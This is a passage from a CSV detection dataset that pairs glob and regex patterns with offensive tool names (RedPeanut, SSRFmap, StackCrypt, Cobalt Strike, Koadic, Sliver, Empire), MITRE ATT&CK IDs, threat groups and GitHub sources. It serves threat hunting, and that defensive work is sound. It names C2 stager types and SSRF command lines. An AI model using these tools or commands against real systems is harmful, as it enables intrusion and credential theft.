.Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SSploitEnumerationDomain*",".{0,1000}SSploitEnumerationDomain.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SSploitExecution_DynamicInvoke*",".{0,1000}SSploitExecution_DynamicInvoke.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SSploitExecution_Injection*",".{0,1000}SSploitExecution_Injection.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SSploitLateralMovement*",".{0,1000}SSploitLateralMovement.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SSploitPersistence*",".{0,1000}SSploitPersistence.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SSploitPrivilegeEscalation*",".{0,1000}SSploitPrivilegeEscalation.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*sspr2john.py*",".{0,1000}sspr2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*--ssrf --gopher --encode --scan-action filter-bypass*",".{0,1000}\-\-ssrf\s\-\-gopher\s\-\-encode\s\-\-scan\-action\sfilter\-bypass.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*ssrfmap -r *.txt -p id -m 
readfiles*portscan*",".{0,1000}ssrfmap\s\-r\s.{0,1000}\.txt\s\-p\sid\s\-m\sreadfiles.{0,1000}portscan.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*SSRFmap*",".{0,1000}SSRFmap.{0,1000}","offensive_tool_keyword","SSRFmap","SSRF are often used to leverage actions on other services. this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.","T1210.001 - T1190 - T1191 - T1505 - T1213","TA0007 - TA0002 - TA0008 - TA0001","N/A","N/A","Web Attacks","https://github.com/swisskyrepo/SSRFmap","1","0","N/A","N/A","10","2756","484","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" "*ssrfmap.py*",".{0,1000}ssrfmap\.py.{0,1000}","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/swisskyrepo/SSRFmap","1","1","N/A","N/A","10","2756","484","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" "*SSSDKCMExtractor.py*",".{0,1000}SSSDKCMExtractor\.py.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","N/A","10","2","125","13","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z" "*StackCrypt-main*",".{0,1000}StackCrypt\-main.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - 
T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","153","25","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*StackEncrypt.cpp*",".{0,1000}StackEncrypt\.cpp.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","153","25","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*StackEncrypt.exe*",".{0,1000}StackEncrypt\.exe.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","153","25","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*StackEncrypt.sln*",".{0,1000}StackEncrypt\.sln.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","153","25","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*StackEncrypt.vcxproj*",".{0,1000}StackEncrypt\.vcxproj.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","153","25","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" 
"*stage.obfuscate*",".{0,1000}stage\.obfuscate.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "*stage_smartinject*",".{0,1000}stage_smartinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 
- T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*stage_transform_x64_prepend*",".{0,1000}stage_transform_x64_prepend.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*stage_transform_x64_strrep1*",".{0,1000}stage_transform_x64_strrep1.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*stage_transform_x86_prepend*",".{0,1000}stage_transform_x86_prepend.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*stage_transform_x86_strrep1*",".{0,1000}stage_transform_x86_strrep1.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*stage1-remotepipelist.py*",".{0,1000}stage1\-remotepipelist\.py.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - 
TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*Stage-gSharedInfoBitmap*",".{0,1000}Stage\-gSharedInfoBitmap.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*stageless 
payload*",".{0,1000}stageless\spayload.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","N/A","10","10","988","223","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*StageListenerCmd*",".{0,1000}StageListenerCmd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*stager/js/bitsadmin *",".{0,1000}stager\/js\/bitsadmin\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*stager/js/disk*",".{0,1000}stager\/js\/disk.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*stager/js/mshta*",".{0,1000}stager\/js\/mshta.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*stager/js/regsvr *",".{0,1000}stager\/js\/regsvr\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*stager/js/rundll32_js *",".{0,1000}stager\/js\/rundll32_js\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*stager/js/wmic *",".{0,1000}stager\/js\/wmic\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*stager_bind_pipe*",".{0,1000}stager_bind_pipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 
T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*stager_bind_pipe*",".{0,1000}stager_bind_pipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*stager_bind_tcp*",".{0,1000}stager_bind_tcp.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike 
Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 